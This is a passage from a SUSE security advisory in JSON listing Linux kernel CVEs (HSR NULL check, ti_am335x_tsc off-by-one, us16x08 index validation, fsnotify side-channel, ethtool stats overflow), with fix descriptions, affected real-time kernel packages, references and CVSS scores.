CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68788"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68788",
"url": "https://www.suse.com/security/cve/CVE-2025-68788"
},
{
"category": "external",
"summary": "SUSE Bug 1256638 for CVE-2025-68788",
"url": "https://bugzilla.suse.com/1256638"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68788"
},
{
"cve": "CVE-2025-68789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68789"
}
],
"notes": [
{
"category": "general",
"text": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68789",
"url": "https://www.suse.com/security/cve/CVE-2025-68789"
},
{
"category": "external",
"summary": "SUSE Bug 1256781 for CVE-2025-68789",
"url": "https://bugzilla.suse.com/1256781"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
